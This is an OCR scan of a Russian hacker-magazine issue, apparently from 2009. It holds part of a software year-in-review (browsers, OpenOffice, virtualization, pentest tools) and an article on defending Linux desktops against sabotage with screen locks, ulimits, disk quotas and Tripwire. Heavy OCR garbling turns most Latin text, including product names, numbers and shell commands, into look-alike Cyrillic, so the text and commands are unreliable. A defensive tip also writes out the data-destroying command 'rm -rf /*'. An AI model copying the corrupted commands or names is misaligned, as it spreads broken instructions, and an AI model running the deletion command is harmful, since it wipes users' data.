АРІ для аутентификации. Пока в качестве 
ЬаскепсГа можетбыть использован только 
РоІісуКіі 

В целом, у КОЕ есть все шансы вернуть доверие 
Линуса :). 

ХОЛОДНАЯ ВОЙНА 
БРАУЗЕРОВ 

Не знаю, как для тебя, но для меня браузер 

— один из основных рабочих инструментов. 
Уходящий год в мире браузеров был богат на 
события и релизы. Новичок — Ооодіе СЬготе 

— обзавелся тремя релизами и отхватил около 
4% рынка браузеров (если верить статистике 
зіюіюоипіюг.сот ). Очень популярная у наших 
соотечественников Орега в прошедшем году 
получила релиз за номером 10. Основные 
изменения: 

• Новая версия движка Ргезію, значительно 
ускоряющего отрисовку страниц. Ктомуже, 
теперь Орега полностью проходит АСЮЗ (тест 
поддержки браузером ѴѴеЬ-стандартов]. 

• Проверка орфографии для 51 языка. 

• Технология Орега ТигЬо — запрошенная 
клиентом страница предварительно сжимается 
на сервере Орега. Меньшетрафика и выше 
скорость! 

Самый популярный открытый браузер — Рігеіюх 
дорос до нового релиза 3.5. И должен дорасти 
до 3.6 к концу года. Основные нововведения в 
версиях3.5 и 3.6: 

• Поддержка некоторыхтегов формата 
НТМІ_5, самые интересные из которых: аибіо 
и ѵібео. Теперь встроить звуки или клип в 
страничку очень просто. Есть встроенная 
поддержка кодеков Одд ѴогЬіз и Одд ТЬеога. 
Видео может проигрываться в полноэкранном 
режиме. 

• Режим приватного просмотра, в котором не 
ведется никакая история. 

• Поддержка определения местоположения. 
Рігеіюх может сообщать сайту твое приблизи- 
тельное местоположение (пользуясь сервисом 
Ооодіе Еосабоп Зегѵісез). 



• Поддержка определения ориентации с помо- 
щью акселерометров. 

• Проект Регзопаз — поддержка урезанныхтем, 
не нуждающихся в перезагрузке для приме- 
нения. 

• Поддержка формата ѴѴеЬ Ореп Еопі Еогтаі 
(ѴѴОЕЕ) для распространения шрифтов 
ОрепТуре, Ореп Еопі Еогтаі или ТгиеТуре в 
сжатом виде. 

• Страница аЬоиСзиррогі:, содержащая инфор- 
мацию о версии, установленных плагинах и 
основных параметрах конфигурации. 

Еігеіюх3.7 должен выйти в первой половине 
2010. Об изменениях известно пока немного: 

• Несколько измененный внешний вид: ис- 
пользование одинаковых кнопоквперед/назад 
на всех платформах, удаление визуального 
разделителя между панелями. 

• Поддержка ѴѴеЬОЕ — технологии, позволяю- 
щей получать доступ кфункциям ОрепОИ через 
НТМИб сапѵазіюд и баѵаЗсгірі:. 

На мой взгляд, Еігеіюх — самый успешный 
ОрепЗоигсе-проектдля пользователя. Посуди 
сам: за всю историю существования Еігеіюх его 
скачали более миллиарда раз, в день релиза 
версии 3.0 ее скачали более 8 миллионов 
человек(о чем даже записано в книге рекордов 
Гиннеса); с сентября 2009 года Еігеіюх 3.5 — са- 
мый популярный браузер в Европе (по версии 
зіаісоипіег.сот ]. 

ОРЕІМОРРІСЕ 

Второе место в рейтинге ОрепЗоигсе-проек- 
тов для пользователя по праву принадлежит 
офисному пакету ОрепОШсе. В 2009 году уви- 
дели свет версии 3.0.1, 3.1 и 3.1 .1 . В середине 
декабря ждем еще 3.2. 

Основные изменения версий 3.0.1 -3.2: 

• Существенноеувеличение производитель- 
ности. 

• Увеличение размера личного словаря до 
30 000 слов. 

• Усовершенствование функции комментари- 
ев ктексту, теперь поддерживается функция 
диалога. 




00о4кІСІ5 



• Поддержка метаданных формата О О Р 1.2. 

• Поддержка Орепіуре/СЕЕ шрифтов. 

• Начальная поддержка «умных» шрифтов 
Сгарбіію. 

• Улучшенный импортООХМИ. Возможность 
экспорта в ООХМИ. 

У проекта есть достаточно подробный гоабтар, 
из которого можно узнать, что версия 3.3 
выйдет в конце мая 2010, 3.4 — в ноябре 2010. 
Планируемые изменения: 

• Удаление поддержки старых форматов 
ЗіагСЖісе (*.5бѵѵ, *.5бс, *.збб) (в версии 3.4). 

• Интеграция первых достижений проекта 
Пепа ізза псе (проект по изменению внешнего 
вида 0 репОібі се). 

• Импорт 5ѴВ. 

• Возможность сравнивать табл и цы при срав- 
нении документов. 

В конце уходящего года разработчики пред- 
ставили новый проект00о4кібз — упрощенную 
версию ОрепОібісе для детей. Из «взрослого» 
ОрепОШсе был убран некоторый функционал, в 
связи с чем возросла производительность. Ктому 
же, немного изменен интерфейс: меньше кнопок 
на верхней панели, и добавлена боковая панель. 
Пакет пока еще не имеет русского интерфейса. 

ВИРТУАЛИЗАЦИЯ 

Вотуже несколько леттехнология виртуали- 
зации развивается стремительными темпами, 
область ее применения все ширится и ширится. 
Главным направлением развития виртуализа- 
ции в уходящем году была 30-акселерация в 
гостевой системе. Сначала давай взглянем на 
список изменений в ѴМѵѵаге ѴѴогкзіюбоп 7: 

• Поддержка 30 (ОрепОЕ2.1 и Вбабег МобеІЗ.О] 
в гостевых ОС Місгозоіб. 

• Виртуальная печать позволяет без установки 
принтеров печатать на все принтеры хостовой 
ОС — принтеры добавляются в гостевую ОС 
автоматически. 

• Возможность обновления ѴМѵѵаге Тооіз через 
интернет. 

• Возможность создания снимков виртуальной 
машины по расписанию. 

• Шифрование и защита паролем виртуальных 
машин. 

• Возможность поставить на паузу виртуальную 
машину. 

• Добавлена поддержка режима совместимос- 
ти в ѴѴіпбоѵѵз 7. 
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Основной конкурент ѴѴМѵѵаге ѴѴогкзІаОоп на десктопе — Зип 
ѴігіиаІВох. Несмотря на непонятную судьбу компании-раз- 
работчика (поглотит ее Огасіе Согрогабоп или нет], данный 
продукт виртуализации активно развивался (в 2009 годуза- 
релизились версии 2.20, 3.0.0-3.0.10]. Основные новшества: 

• Импорти экспорт виртуальных машин в формат ОѴР (Ореп 
Ѵіііиаіігабоп ЕогтаД 

• ѴТ-х/АМО-Ѵ включены по умолчанию. 

• Поддержка ІЭ5В на хосте ОрепЗоІагіз. 

• Аппаратноеускорение ОрепОбЗО для хостов І_іпих и 
Зоіагіз. 

• Эмуляция до 32-х виртуальных СРЮ. 

• Возможность аппаратного ускорения РігесіЗР на 
ѴѴіпсІоѵѵз -госте. 

• Добавлена поддержка режима совместимости в ѴѴіпсІоѵѵз 7. 

• Появился портѴігШаІВох на ЕгееВЗР. 

Другая динамично развивающаяся система виртуализации, 
способная эмулировать различные платформы (Оети) в 
уходящем году была представлена двумя релизами — 0.10 и 
0.1 1 . Список основных изменений: 

• Поддержка КѴМ. 

• Для компиляции больше нетребуется ССС 3.x. 

• Эмуляция В5Р изегзрасе. 

• Эмуляция I пѣеі е 1 000, ІЧокіа І\І-зегіез1:аЫ.е1:, ОМАР2. 

• РСІ Ьоііріид. 

• Поддержка псевдонимов для виртуальных машин. 

• Возможность задать последовательность загрузки. 

• Поддержка блочныхустройств через ЫЧр. 

Широко использующаяся на серверах система виртуали- 
зации Хеп перенесла одно крупное обновление — была 
выпущена версия 3.4.0 со следующими изменениями: 

• Усовершенствован пробросустройств, особый акцент 
сделан на устройства для рабочих станций. 

• Значительныеулучшения, касающиеся надежности и 
отказоустой ч и вости . 

• Усовершенствован интерфейс Ѵігісііап (Нурег-Ѵ). 

• Управление питанием. Новые алгоритмы разделения про- 
цессорного ресурса, позволяющие использовать энергию 
более экономно. 

УТИЛИТЫ ДЛЯ ПЕНТЕСТИНГА 

Наши любимые инструменты для пентестинга тоже пора- 
довали интересными мажорными релизами. Например, 
зарелизился N тар 5 со следующими изменениями: 

• В комплект программ, поставляемых с птар, добавлена 
утилита псаі — улучшенная версия пс, умеющая работать не 
только сТСР, но и сІЭРР, и обладающая еще целым рядом 
интересных возможностей. 

• Также в комплект добавлена программа псШП, 
позволяющая сравнивать различные результаты 
сканирования. ІМсІШ очень удобно использовать 




Новый интерфейс Кізтеі 



для автоматического периодического сканирова- 
ния сети. 

• Увеличена скорость сканирования портов. В частнос- 
ти, был обновлен списокТСР-портов, сканируемых по 
умолчанию. Сейчас в нем 1715 портов. А в режиме быстрого 
сканирования (птар -Р) теперь сканируются не 1300 портов, 
как раньше, а только 100 наиболее часто используемых. 

• Появилась возможность сканировать суказанием фикси- 
рованного числа пакетов в секунду. 

• Вдва раза увеличена база сигнатур операционных систем. 
Теперь она содержит 2003 записи. Также была увеличена 
база сигнатур приложений — с4558до 5512записей. 

• Значительно улучшена работа І\І5Е (ІЧтар Зсгірбпд 
Епдіпе], расширения, позволяющего использовать простые 
скрипты для автоматизации различных действий с ІМтар. 
Число скриптов в комплекте увеличено (теперь их 59], 
добавлены скрипты для симулирования атак, осуществле- 
ния различных проверок на наличие уязвимостей, подбора 
паролей черезЗЫМР и РОРЗ ит.д. 

Знаменитый снифер ѴѴігезбагк в этом году сначала обно- 
вился до версии 1 .2.0, а затем и до версии 1 .2.3: 

• Расширен списокподдерживаемыхОС;теперьтам при- 
сутствуют Мае 05Х и ѴѴіпсІоѵѵз 7 (втом числе, 64-разрядная]. 

• Автодополнение при вводе фильтров. 

• Добавлена поддержка разрешения РІ\І5-имен с помощью 
библиотеки с-агез. 

• Добавлена поддержка разбора многих новых протоколов, 
а также форматов файлов с перехваченными пакетами. 

• Поиск в базе данных ОеоІР и интеграция ОрепЗіхееіМар 
с ОеоІР. 

• Улучшен вывод на печать в формате РозІзсгірЕ 

• Поддержка Рсар-пд — нового формата файлов для хране- 
ния перехваченных пакетов. 

• Поддержка получения информации о процессах через 
ІРЕІХ. 

• Последний используемый профиль конфигурации отныне 
сохраняется. 

• Настройки протоколов можно изменить из контекстного 
меню пакета. 

• Поддержка сравнения ІР-пакетов. 

• Саріпіо теперь показываетсреднюю скорость прохожде- 
ния пакетов. 

Известный снифер сетей 802.1 1 Кізтеі; порадовал нас 
новым релизом 2009-06-Р1 : 

• Полностью переписанное ядро КізтеІ-ІЧеѵѵсоге. 

• Новый пользовательский интерфейс. 

• Новые опции для фильтрации. 

• Можетчастично выполнять функции ЮЗ. 

• Новая архитектура с поддержкой плагинов. 




НТТР://ѴѴѴШ 

■ I 

> Ііпкз 

Роабтар’ы извест- 
ных проектов: 

• ЫірУ/Ііѵе.дпоте. 
огд/ЗсЬесІиІе 

• ЬирУ/еп.ѵѵікіресІіа. 
огд/ѵѵікі/ 

КРЕ 4#РеІеазе 
зсбесіиіе 

• Ьирз://ѵѵікі.то 2 іиа. 
огд/Еігеіюх/РоасІтар 
ЫЧрУ/ѵѵікі.зегѵісез. 
орепоІЧісе.огд/ѵѵікі/ 
ЕеаШгез 




> іпіо 

В ІІЬипіи 9.10 можно 
включить дпоте- 
збеііс помощью 
команды «дпоте- 
зЬеІІ --геріасе». 
После перезагрузки 
система вернется к 
прежнему виду. 
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МЕСТНЫЕ РЕАЛИИ 

Одним из главных вопросов при мигра- 
ции обычного офиса с винды на линукс 
была корректность работы небезызвес- 
тной бухгалтерской программы от«1С». 
Сервер уже давно и успешно работает 
под линуксом, а вот с клиентом слож- 
нее. Да, после плясок с бубном можно 
было заставить его работать в обычном 
ѵѵіпе, но стабильность работы никто не 
гарантировал. Можно было купить ѵѵіпей 
еіегзой, гарантированно поддерживаю- 
щий клиент, но ключевое слово «купить» 
и стоимость сетевых версий не каждому 
руководству по нраву, особенно в кризис- 
ные времена. 

Но вдругсвершилось чудо! «1 С» выпустила но- 
вую версию платформы «1 С: Предприятие 8.2», 
с поддержкой линукса клиентом. Правда, пока 
только веб-клиентом (и только через Рі гебох) , но 
это уже не может не радовать. 

Еще один класс приложений, работа которых 
в линуксе просто необходима при миграции 
некоторых предприятий — всевозможные 
САО-системы. В ѵѵіпе корректно работают 
далеко не все приложения этого класса, а уж 
нормальные нэйтивные можно пересчитать 
по пальцам одной руки. Но в конце уходя- 
щего года показался свет в конце тоннеля 
— компания еіегзоЛ выпустила специальную 
версию своего ѵѵіпе, заточенную под работу 
САО-систем — ѵѵіпейеІюгзоЛ ОАО. На момент 
написания статьи программа находилась в 
стадии Ьеіа-тестирования и поддерживала 
только Компас 30 10. В планах поддержка 



АіЛоСАО 2008, Компас309, Компас График, 
ВгіскзСАО и Ріапітасег. 

ПРЕКРАСНОЕ ДАЛЕКО, 

ИЛИ ЧТО ГОД ГРЯДУЩИЙ 
НАМ ГОТОВИТ 

Кроме описанного выше, в грядущем году 
можно ждать ВІМР 2.8 и ТГіипсІегЬігсІ 3. 
Назвать дату выхода «убийцы фотошопа» 
сложно даже приблизительно, так как разра- 
ботчики, видимо, не очень любят составлять 
гоабтар’ы и давать обещания :). Из нововве- 
дений стоит отметить: 

• Дальнейшая интеграция ВЕСЕ (ВЕпегіс 
ОгарЫсз ЫЬгагу, библиотека для обработки 
изображений]. 



• Долгожданный однооконный интерфейс 
(опционально]. 

• Улучшение инструмента «Текст». Отныне текст 
вводится прямо на холсте, а не в отдельном 
маленьком окне. 

• Каталогизация ресурсов — клюбой кисти, 
текстуре или градиенту можно будет добавить 
метку, по которой потом удобно осуществлять 
поиск. 

• Поддержка простых векторных слоев. 

• В числовых полях ввода теперь можно ис- 
пользовать арифметические выражения. 
Популярный почтовый клиент в начале следую- 
щего года дорастет до версии 3. Изменения: 

• Движокот ЕігеІюхЗ.5 (Оеско 1 .9.1 ], благодаря 
чему поддерживаются все функции огнелиса 
3.5 (теги аибіо, ѵібео и прочее]. 

• Система вкладок, как в Еігеіюх. При выходе из 
программы запоминаются текущие открытые 
вкладки. 

• Новая поисковая система —теперь все 
сообщения индексируются. Поиск по индексу 
работаеточень быстро. 

• Новый мастер настройки учетных записей. 

• «Умные» папки — при наличии нескольких 
учетныхзаписей можно использовать для них 
общие папки. 

• Предпросмотр нескольких сообщений. 

• Упрощенная работа с контактами. 

• Новый менеджер расширений. 

• Менеджер активности — ведет лог внутрен- 
них событий проги. 

ЗАКЛЮЧЕНИЕ 

Исходя из описанных нововведений, рискну 
предположить, что год 2010 станет годом 
линукса на десктопе. Хотя... где-то я это уже 
слышал :]. т 



Попѵлярность различных браузеров вЕвропев2009 году 
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ІЛМІХОЮ 



■ ■ ЕВГЕНИЙ ЗОБНИН 20ВЫШгаѲМАІБ.С0М 

Береги 

себя 

Защищаемся 

отзападлостроений 

В прошлом номере мы говорили о шутках, 
западлостроениях и всем том, что мож- 
но сделать с ІЛ\І IX- системой в отсутствие 
владельца машины (или подсунув ему 
наш зловредный код). Все это, конечно, 
интересно и необычайно эффективно, вот 
только совершая западлостроение против 
другого, надо думать и о себе. Рано или 
поздно месть придет, и к ней надо быть 
готовым. 



Н аиболее эффективной защитой от 

разного рода вторжений в твою систему 
будетповышениеуровня паранойи, 
и чем этотуровеньвыше— тем лучше 
для тебя любимого. Сложные пароли, 
регулярные проверки файлов на изменения, 
ограничение всего и вся — вот, чем ты должен за- 
ниматься, не пропуская ни одного мало-мальски 
подозрительного процесса. И первое, с чего сле- 
дует начать — сзащиты своего рабочего места. 

ЗАЩИТА РУБЕЖЕЙ 

Западлостроения в офисе, учебном заведении и 
любом людном месте наиболее распространены 
и эффективны. Машины постоянно остаются без 
присмотра и любой, хоть чуточку подкованный 
втехническом плане, человек может делать 
сброшенными системами все, что угодно. Ты 
уходишьза кофе, возвращаешься и видишь 
вместо привычного черного окна хіегт нечто 
раскрашенное в гламурно-розовый цвете кад- 
ром из какого-то ситкома в качестве бэкграунда. 
Страшного ничего нет, зато ЛОР на ближайшие 
10 минут остался без тебя. 

Ксчастью, защититься от физического доступа 
очень просто. Для этого надо привыкнуть 
блокировать экран на время своего отсутствия (и 



можно спокойно бродить где угодно). Способов 
сделать это уйма, начиная от выбора пункта 
меню БоскЗсгееп в любой среде и заканчивая 
клавиатурными комбинациями: <СМ+АІ1:+1_> 
(КОЕ и Споте) и <С1х1+АИ:+Ое1> (ХІсе). Тоже 
самое можно сделать и из командной строки: 

КБЕ $ дсІЪиз огд . ТгеесіезкСор . 

ЗсгеепЗаѵег /ЗсгеепЗаѵег Ьоск 

Споте $ дпоте-зсгеепзаѵег-соттапсі -1 

ХТсе $ хТІоск 

Для остальных случаев можно использовать 
команду: 

$ хзсгеепзаѵег-соттапсі -Іоск 

Или установить программку хіоск, если 
хзегеепзаѵег не активирован. Консольный 
аналог называется ѵіоск. Популярные текстовые 
оконные менеджеры, такие как 6І\ІІІ Зсгееп и 
Ттих, также позволяютлочитьтерминал. 
Блокировка экрана не принесетбольшой 
выгоды, если в ВІ05 активирована возможность 
загрузки с СБ (всегда найдутся перцы, которые 
вставят І_іпих ЫѵеСО в привод и нажмут кнопку 
ВезеД Поэтому загрузку с любых носителей, 




кроме жесткого диска, придется запретить через 
СМОЗЗеІир и поставить на него пароль. Для 
пущей надежности обнули файлМс/зесигеиу, 
хранящий списки всехтерминалов, с которых 
возможен вход под учетной записью гооЕ 
Если же враг все-таки ухитрился войти в 
систему, украв пароль или же каким-то другим 
способом, то его деятельность легко отследить 
с помощью вызова команды «Іазі», которая по- 
кажет все, гхм, акты проникновения, а также чте- 
ния файлов истории (~/. ЫзЕогу, ~/.ЬазЬ_Ыз1;огу) 
и логов. 

ИНСАЙДЕРЫ 

Второй по популярности способ проникновения в 
систему с целью устроить пользователю западло 
основан на подкидывании жертве подложного 
пакета, конфигурационного файла или команды. 
Метод защиты от подобного вида бомбзамедлен- 
ногодействия сводится кследованию ряду ба- 
нальных, но заслуживающих внимания правил: 

1. Не запускай команды, действие которых ты пол- 
ностью не понимаешь. Различные зловредные 
команды ІІІХІХ-шелла могут быть ловко замас- 
кированы в зб/регІ/руіЬоп/гиЬу-скрипт, запустив 
который ты можешь остаться без системы. 

2. Не применяй конфигурационные файлы без 
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их прочтения. Некоторые приложения позво- 
ляют поместить в конфиг целый скрипт, кото- 
рый может сделать очень многое. 

3. Не накладывай патчи на исходники софтин 
без прочтения их содержимого или хотя бы 
удостоверения того факта, что они были полу- 
чены из источников, заслуживающих доверия. 
Нет никаких гарантий, что патч не содержит 
бэкдор, вредоносный код или другую пакость. 

4 . Никогда не устанавливай пакеты вручную, 
путем скачивания с сайта и исполнения коман- 
ды грт/сіе Ь/что -то еще. Любой нормальный 
дистрибутив имеет удаленный репозиторий, для 
доступа к которому используются ключи, а все 
пакеты имеют проверочный хэш-код. В крайнем 
случае, скачивай пакеты с сайтов, идентифици- 
рующих себя с помощью сертификатов. 

5 . Всегда распаковывай архивы во временный 
подкаталог своего домашнего каталога и не 
ленись проверять их содержимое перед рас- 
паковкой. Архив может быть іаг-бомбой, под- 
меняющей файлы твоего домашнего каталога, 
или содержать сіесотргеззіоп-бомбу, которая 
после распаковки превратится в огромный 
файл, и если он попадет, например, в Дтр, то 
работоспособность системы будет нарушена. 

6. Создай файл с именем «-і» в корневом 



каталоге (іюисб /- і). Это заставит команду «гт 
-Н /*» спрашивать пользователя перед удале- 
нием каждого файла корневого каталога (гт 
примет файл «-і» за флаг командной строки]. 

ВРАГ ВНУТРИ 

Можно долго выстраиватьлинию обороны, с 
подозрением относиться ко всему и вся, выду- 
мывать сложнейшие пароли, но если какая-то 
гадость попадет в систему, бороться с ней при- 
дется уже на ближних рубежах. В этом деле тебе 
помогутправильные права доступа, ограниче- 
ния и специальныеутилиты, предназначенные 
для контроля целостности системы. 

Любая ІІІЧІХ-сисгема позволяет накладывать 
самые разнообразныеограничения на процессы 
пользователей. Это можетбыть максимальное 
количество открытых файлов, максимальное 
количество процессов, п риоритет процессов и т.д. 
Также существуютдисковые квоты, предназна- 
ченныедля ограничения занимаемого файлами 
пользователя пространства на диске. Правильная 
установка ограничений позволитзапереть зло- 
вредные процессы в коробку, границы которой они 
не смогут на рушить, а следовательно, и навредить 
системе. Ограничения особенно эффективны про- 
тив различных форк-бомб, плодящих бесконечное 
количество процессов и сжирающих память; про- 
грамм, создающих массу файлов; сіесотргеззіоп- 
бомб и тому подобных «приложений». 

ОГРАНИЧИВАЕМ 
РЕСУРСЫ ПРОЦЕССОВ 

Ограничения на процессы накладываются с по- 
мощью команды и Іігттіі;. Запусти ее с флагом ‘-а’, 
чтобы увидеть текущие значения. Наиболее 
интересны для нас строки: 

1. Строка «баФ зед зіге», флаг ‘-6'. 
Максимальный размер сегмента данных про- 
цесса. Обычно не ограничен, а это значит, 
что любой процесс может запросто отожрать 
сколько угодно оперативной памяти с помо- 
щью вызова таІІосО. Трудно сказать, каким 
будет оптимальное значение: одни программы 
потребляют очень много памяти (например, 
Оітр, который хранит изображения, слои, 
историю и все остальное в сыром виде], дру- 
гие обходятся пару килобайтами. Стоит попро- 
бовать значение 20480 (20 Мб] и наращивать 
его в случае необходимости. 

2. Строка «Пе зі ге», флаг ‘-Г. Максимально 
допустимый размер создаваемого файла. В 
большинстве систем значение не ограничено, 
а это значит, что любой пользовательский про- 
цесс способен создать файл, размер которого 
будет ограничен только лимитами, заложенны- 
ми в файловую систему. Правильным значе- 
нием будет размер порядка 8 Гб, указанный в 
блоках файловой системы (обычно 4 Кб]. 

3. Строка «ореп бііег», флаг ‘-п’. Максимальное 
количество одновременно открытых файлов. В 
большинстве настольных систем установлено в 
1024, что очень разумно. Снятие ограничения при- 
ведет к тому, что процесс сможет открывать файлы 
до тех пор, пока система не впадет в ступор. 

4 . Строка «тах изег ргосеззез», флаг ‘-и’. 
Максимальное количество порождаемых 
пользователем процессов. Обычно значение 



не ограничено, благодаря чему самая простая 
форк-бомба может разгуляться на всю катуш- 
ку. В то же время установка лимита может 
еще более усугубить ситуацию. Дело в том, 
что современное ядро І_іпих вполне способно 
выдержать действие форк-бомбы, оставаясь 
при этом отзывчивым, а значит, позволит 
пользователю открыть терминал и убить вред- 
ный процесс. Установив же ограничение, мы 
добьемся того, что во время действия форк- 
бомбы будет достигнут лимит процессов, и 
пользователь уже не сможет запустить терми- 
нал или выполнить любую другую команду. 

В Ыпих предпочтительные значения ограни- 
чений можно указывать нетолько с помощью 
вызова команды иіітіг но и используя кон- 
фигурационный файл /еІх/зесигіІу/ІітіІъ.сопГ 
формат которого следующий: 

«іошаіп> <Суре> <гезошгсе> <ѵа1ие> 

Где <ботаіп> — это имя пользователя, (бгруппа 
или символ '*’ для всех. Столбец <1уре> —тип 
ограничения (зоіф Ьагб или для обоих], 
<гезоигсе> — ограничиваемый ресурс, <ѵа1ие> 

— значение. Для перечисленных выше четырех 
ресурсов их имена для Іітіііз.сопі' будут выгля- 
деть какбаіа, Ізі^е, поПе и пргос. Тип ограниче- 
ния ГіагсІ используется для указания максималь- 
ного значения, которое пользователь вправе 
установить самостоятельно. Стоитсказать, что 
никакие комбинации ограничений не будутосо- 
бенно эффективны против форк-бомб двойного 
действия, — их порождают процессы, каждый из 
которых отжирает память в бесконечном цикле. 
Приведу пример: ты устанавливаешь ограни- 
чение «сіаііа зед зіге», но оставляешь неогра- 
ниченным «тах изег ргосеззез». Форк-бомба 
плодит процессы, и система остается доступной, 
но ровно до момента, пока ее процессы не 
сожрут всю доступную память, а момент насту- 
пит очень быстро (причем вне зависимости от 
значения «сІаГа зед зіге»!). Можно попытаться 
решить проблему, установив значение «баіа 
зед зіге» в 20480, а «тах изег ргосеззез» в 1 28, 
что достаточно жестко и, на первый взгляд, 
эффективно. Однако послезапуска форк-бомбы 
ты получишь следующую картину: если бомба 
сможет породить хотя бы 100 процессов (допус- 
тим, что остальные 28 являются легальными], 
то общий объем съеденной памяти будет равен 
100*20480/1024 = 2000 Мб, а доступ ксистеме 
окажется заблокированным. Поэтому, как ни 
крути, а финал один. Единственный выход: 
жесткие ограничения на «баіа зед зі т.е» и «тах 
изег ргосеззез», плюс постоянно открытый 
шелл с правами гооі: (ограничения на процессы 
которого сняты]. 

УСТАНАВЛИВАЕМ КВОТЫ 

Ограничения на объем занимаемого дискового 
пространства устанавливаются с исполь- 
зованием механизма квот, который может 
б ыть а кти в и р о ва н тол ько су п е р п ол ьзо вате - 
лем. Квоты эффективны против файловых и 
бесотргеззіоп-бомб, ставящихсвоей целью 
произвести Оо5 через попытку полного запол- 
нения файловой системы. 
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# Епд оі Ше 

Файл /еІс/зесипІѵ/ІітіСг.сопІ 1 в ЦЬипСи 



Поддержка квот реализована на уровне ядра, 
но для управления ихустановкой и снятием 
показаний предназначены специальные 
утилиты, обычно распространяемые в пакете 
циоіа. Поэтому сначала следует уста но вить 
этот пакет: 

$ зисіо арк-дек іпзкаіі диока 

Далее переходим в однопользовательский 
режим: 

$ зисіо ЪазЪ. 

# іпік 1 

И добавляем к опциям монтируемых фай- 
ловых систем слово изгциоіа в файле /еіс/ 
ІзІаЬ: 

/с!еѵ/з(іа2 /Ьоше ехкЗ 
сіекаиікз , изгдиока 1 1 

Перемонтируем /боте, чтобы изменения всту- 
пили в силу: 

# тоипк -о гетоипк /Рюше 

Создаем файл квот, в котором будут храниться 
текущие ограничения: 

# коисЪ. /Рюше/адиоРа .изег 

# сЬтосІ 600 /Рюше/адиоРа. изег 



С помощью команды циоіасбеск позволяем сис- 
теме найти файлы квот и связать их с файловой 
системой: 

# диокаскеск 

Запускаем ебциоіа, чтобы настроитьограниче- 
ния для указанного пользователя: 

# есідиока -и <пользователь> 

Команда активирует редактор, используя ко- 
торый необходимо отредактировать настройки 
квот. Формат файла следующий: одна строка 
— одна файловая система. Строка разбита на 
разделенные пробелом и следующие друг за 

ДРУГОМ ПОЛЯ: 

ПОЛЯ ЕйСШОТА 

РіІезузРеш — файловая система (имя 
раздела, на котором она располага- 
ется) 

Віоскз — количество блоков, исполь- 
зуемых пользователем в данный момент 
(блок равен одному килобайту) 

ЗоРР — мягкий лимит на количество 

используемых блоков 

Нагсі — жесткий лимит на количество 

используемых блоков 

Іпосіез — количество іпосіе (файлов) , 

используемых пользователем 

ЗоРР — мягкий лимит на количество 



ТРИ СОВЕТА 



1 . Следи за правами доступа. Все важные системные файлы настроекдолжны быть 
доступны для чтения и записи только суперпользователю. К файлам твоего домашнего 
каталога должен иметь доступ только ты (права 600]. Этого легко добиться, просто указав 
правильную маску прав доступа в ~/. ргобі Іе или -/.Ьазбгс (ита5к077). 

2. Не помещай себя во множество разных системных групп вроде орегаіог, аибіо ит.д. Это 
создает брешь в безопасности и наделяеттебя особыми полномочиями, которые могут 
быть использованы для западла. 

3. Права гооі нужны только тогда, когда они действительно нужны. Не «сиди» под гообом, 
не заходи в систему под гообом, старайся не запускать команды от имени гооР При необхо- 
димости используй зисіо. 



іпосіе 

Нагсі — жесткий лимит на количество 
іпосіе 

Исторически ядра ІІІЧІХпозволяютзадаватьдва 
ограничения для каждого пользователя: мягкое 
и жесткое. Сделанотак, чтобы пользователь, 
превысивший мягкоеограничение.смогузнать 
об этом (получив сообщение в консоль] и успел 
принять меры по очистке своих каталогов перед 
тем, какистечеттакназываемый «период отсроч- 
ки», и мягкое ограничение превратится в жесткое. 
Само собой разумеется, что в современном мире 
подобный наивный подход не действует, поэтому 
жесткое ограничение обычноустанавливают 
в ноль, чтобы ограничение мягкое изначально 
становилосьжестким, и пользователь не мог 
его превысить. Последуем этому примеру и мы. 
Ограничим самого себя 50 гигами (50* 1024*1024 
= 52428800], а максимальное количество файлов 
установим в 2000 : 

#ес)диоІа-ихакер 

Бізк диоказ ког изег хакер (иіб 
1001 ) : 

Рііезузкет Ыоскз зокк Нагсі іпосіез 
зокк Нагсі 

/беѵ/зба2 2043743 52428800 0 162 
2000 0 

Поля Ыоскз и іпобез оставляем неизменными, 
а оба поля баг б устанавливаем в 0. Выходим из 
однопользовательского режима, набрав: 

# іпік 5 

Это все. С лимитом на іпобе, конечно, при- 
дется повозиться перед тем, какты найдешь 
оптимальное для себя значение, но отключать 
его тоже нельзя, ведь некоторые разновидности 
файловых бомб создаютогромное количество 
пустых файлов, которые не занимают места на 
диске, но приводяткисчерпаниюлимита іпобе 
самой файловой системы. 

КОНТРОЛЬ ЦЕЛОСТНОСТИ 
СИСТЕМЫ 

Контроль целостности системы представляет 
собой метод обнаружения разного рода троянов, 
вирусов итому подобной нечисти, путем создания 
заведомо правильного снимка файловой системы 
и последующей сверки его стекущим состоянием 
ФС. Осуществлять контроль целостности можно и 
с помощью простых самописных скриптов, но для 
Ыпихуже давно доступна система ігірѵѵіге, которая 
автоматизирует эту работу и сводит процентлож- 
ныхсрабатываний кминимуму. 

Установить ігірѵѵіге можно с помощью пакетного 
менеджера любого дистрибутива. Например, в 
ІІЬипШ это делается так: 

$ зисіо арк-дек іпзкаіі кгірміге 

Сразу послеустановки начнется процесс конфигу- 
рирования, который будет выводить на экран ин- 
формационные окна и задавать вопросы, на каж- 
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ЬжИлыр ІикЫм | | 

Такое окно увидит пользователь, попытав- 
ший ся войти в машину с за блокированным 
экраном 
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Ошибки во время инициализации базы 
ігірѵѵіге. файл политик придется править 



дый из которых следует отвечать «Ѵез». В конце ты увидишь два 
приглашения к вводу пароля: зйе раззрбгазе и Іосаі раззрбгазе. 
Они оба используются для шифрования баз данных (снимков) 
и конфигурационных файлов, стой лишьразницей, что первый 
можетбыть использован сразу на нескольких машинах. 

После завершения конфигурирования установи правильные 
права на файлы конфигурации и политики: 

$ ссі /еЕс/Егірміге 
$ зисіо сіітосі 0 600 См. с Ед Ем.роі 

Далееты можешь открыть файл политикМсДгірѵѵігеАѵѵ.роІ, 
чтобы изменить правила обработки некоторых файлов. В 
большинстве случаев менять ничего не придется, потому что 
разработчики дистрибутивов сами составляют надлежащие 
файлы политик. После закрытия редактора выполни следую- 
щую команду: 

$ зисіо Іѵѵабтіп --сгеаіе-роііііе --сбдбііе .Дѵѵ.сбд \ 

— гіѣе-кеурііе ./зке.кеу .ДѵѵроІ.Ш 

Все, можно создать снимокфайлов системы, который будет 
использоваться в качестве эталона во время поиска изме- 
нившихся файлов (в качестве пароля введи указанную во 
время установки «Іосаі раззрбгазе»): 

$ зисіо Егірміге --іпіЕ --сЕдЕіІе \ 
/еЕс/Егірміге/Ем. сЕд \ 

--роІЕіІе /еЕс/Егірміге/Ем.роІ 
--зіЕе-кеуЕіІе /еЕс/Егірміге/зіЕе . кеу \ 

-- Іосаі -кеуЕіІе /екс/Егірміге/НОЗТЫАМЕ- 
Іосаі . кеу 

Теперь можно выполнить пробную проверку: 

